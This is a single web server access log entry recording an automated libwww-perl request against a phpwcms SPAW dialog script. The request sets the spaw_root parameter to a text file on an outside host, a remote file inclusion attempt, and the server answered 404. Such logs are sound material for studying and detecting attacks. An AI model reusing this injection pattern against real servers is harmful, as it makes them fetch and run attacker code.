200.19.190.150 - - [22/Jul/2007:19:36:11 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
